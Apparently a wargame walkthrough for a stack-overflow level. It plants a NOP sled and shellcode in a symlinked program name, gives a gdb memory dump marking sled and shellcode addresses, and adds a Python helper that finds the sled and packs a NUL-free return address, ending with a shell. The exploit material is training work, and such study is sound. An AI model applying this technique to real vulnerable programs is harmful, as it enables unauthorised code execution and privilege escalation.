hint: if you look at the memory, there is a value that was never initialized.

Set a breakpoint on leave, run the program, and inspect memory from esp: the file name the program was executed under is still there, never zeroed, sitting near the very top of the stack. We use that surviving copy to solve this level.

As in the previous level, solve it with a symbolic link: link to the binary under a name consisting of a NOP sled followed by the shellcode, and run it through that link. Since a file name cannot contain '/' (0x2f) or a NUL byte, the shellcode written into the link name must avoid both bytes.




Below is the dump showing the address at which we can land on the NOP sled. Reading each word little-endian, the string "/home/vampire/" starts at 0xbfffff6b, the 0x90 sled begins at 0xbfffff79 right after the trailing '/', and the shellcode follows at 0xbfffffb5.



(gdb) x/100x $esp
0xbffff9a8:     0x00000002      0x00000002      0x00000000      0x00000000
0xbffff9b8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff9c8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff9d8:     0x90909090      0xbfbfbfbf      0x00000000      0xbffffa24
0xbffff9e8:     0xbffffa30      0x40013868      0x00000002      0x08048450
0xbffff9f8:     0x00000000      0x08048471      0x08048500      0x00000002
0xbffffa08:     0xbffffa24      0x08048390      0x080486ac      0x4000ae60
0xbffffa18:     0xbffffa1c      0x40013e90      0x00000002      0xbffffb1c
0xbffffa28:     0xbffffbad      0x00000000      0xbffffbde      0xbffffbf0
0xbffffa38:     0xbffffc09      0xbffffc28      0xbffffc4a      0xbffffc57
0xbffffa48:     0xbffffe1a      0xbffffe39      0xbffffe56      0xbffffe6b
0xbffffa58:     0xbffffe8a      0xbffffe93      0xbffffe9e      0xbffffeae
0xbffffa68:     0xbffffeb6      0xbffffec2      0xbffffed3      0xbffffedd
0xbffffa78:     0xbffffeeb      0xbffffefc      0xbfffff0a      0xbfffff15
0xbffffa88:     0xbfffff28      0x00000000      0x00000003      0x08048034
0xbffffa98:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffaa8:     0x00000006      0x00001000      0x00000007      0x40000000
0xbffffab8:     0x00000008      0x00000000      0x00000009      0x08048450
0xbffffac8:     0x0000000b      0x000001fd      0x0000000c      0x000001fd
0xbffffad8:     0x0000000d      0x000001fd      0x0000000e      0x000001fd
0xbffffae8:     0x00000010      0x0fabfbff      0x0000000f      0xbffffb17
0xbffffaf8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb08:     0x00000000      0x00000000      0x00000000      0x69000000
0xbffffb18:     0x00363836      0x00000000      0x00000000      0x00000000
0xbffffb28:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
...omitted...
0xbffffe58:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe68:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe78:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffe98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffea8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffeb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffec8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffed8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffee8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffef8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff08:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff18:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff28:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff38:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff48:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff58:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff68:     0x2f000000      0x656d6f68      0x6d61762f      0x65726970
0xbfffff78:     0x9090902f      0x90909090      0x90909090      0x90909090
0xbfffff88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffa8:     0x90909090      0x90909090      0x90909090      0xd9c5d990
0xbfffffb8:     0xb8f42474      0xd769c315      0xb1c9295d      0x1a45310b
0xbfffffc8:     0x831a4503      0xe0e204c5      0x938f62a9      0x8e47137c
0xbfffffd8:     0xb87052e3      0x381717cc      0x5185f77b      0xf3a98e15
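The script below is an added example (not part of the original post) that automates the step above: it parses gdb `x/Nx` output, decodes each little-endian word into bytes, finds the longest run of 0x90 bytes, and picks a return address in the middle of that sled, rejecting one that would contain a NUL byte. The embedded dump is a constructed excerpt of the output shown above, and the function names are my own.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed excerpt of the `x/100x $esp` output shown above. The omitted
# middle is left out; the stray 0x90909090 word near $esp is kept to show
# that a 4-byte run is not mistaken for the sled.
DUMP = """\
0xbffff9d8:     0x90909090      0xbfbfbfbf      0x00000000      0xbffffa24
...omitted...
0xbfffff68:     0x2f000000      0x656d6f68      0x6d61762f      0x65726970
0xbfffff78:     0x9090902f      0x90909090      0x90909090      0x90909090
0xbfffff88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffa8:     0x90909090      0x90909090      0x90909090      0xd9c5d990
0xbfffffb8:     0xb8f42474      0xd769c315      0xb1c9295d      0x1a45310b
"""

# One gdb line: "0xADDR:" followed by one or more 8-hex-digit words.
LINE_RE = re.compile(r"^\s*0x([0-9a-fA-F]+):((?:\s+0x[0-9a-fA-F]{8})+)\s*$")


def parse_dump(text: str) -> Dict[int, int]:
    """Map every byte address in a gdb `x/Nx` dump to its value.

    gdb prints 32-bit words in host order, which on x86 is little-endian:
    the word 0x9090902f at 0xbfffff78 means byte 0x2f at 0xbfffff78 and
    0x90 at 0xbfffff79..0xbfffff7b. Lines that do not look like dump
    lines ("(gdb)", "...omitted...") are skipped.
    """
    mem: Dict[int, int] = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr = int(m.group(1), 16)
        for word in m.group(2).split():
            for b in int(word, 16).to_bytes(4, "little"):
                mem[addr] = b
                addr += 1
    return mem


def find_nop_sled(mem: Dict[int, int], min_len: int = 16,
                  nop: int = 0x90) -> Optional[Tuple[int, int]]:
    """Return (start, length) of the longest run of `nop` bytes at
    consecutive addresses, or None if no run reaches `min_len`."""
    best: Optional[Tuple[int, int]] = None
    start, run, prev = 0, 0, None
    for addr in sorted(mem):
        if mem[addr] == nop:
            if run and prev is not None and addr == prev + 1:
                run += 1
            else:
                start, run = addr, 1
        else:
            run = 0
        if run >= min_len and (best is None or run > best[1]):
            best = (start, run)
        prev = addr
    return best


def pick_return_address(mem: Dict[int, int]) -> Dict[str, object]:
    """Choose a return address in the middle of the sled, so a small error
    in the stack layout still lands on NOPs, and reject an address that
    contains a NUL byte (a strcpy-based overflow would stop copying there)."""
    sled = find_nop_sled(mem)
    if sled is None:
        raise ValueError("no NOP sled of sufficient length in dump")
    start, length = sled
    ret = start + length // 2
    packed = ret.to_bytes(4, "little")
    if 0 in packed:
        raise ValueError("return address %#x contains a NUL byte" % ret)
    return {
        "sled_start": start,
        "sled_len": length,
        "shellcode": start + length,   # first non-NOP byte after the sled
        "ret": ret,
        "ret_bytes": packed,           # byte order as written into the overflow
    }


if __name__ == "__main__":
    info = pick_return_address(parse_dump(DUMP))
    for k, v in info.items():
        print(k, hex(v) if isinstance(v, int) else v)
```

Paste the real `x/Nx` output into DUMP (or read it from a file) to get the sled bounds and a packed return address for the overflow; the NUL check matters because the link name and the overflow payload both go through C string handling.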




Got a shell.


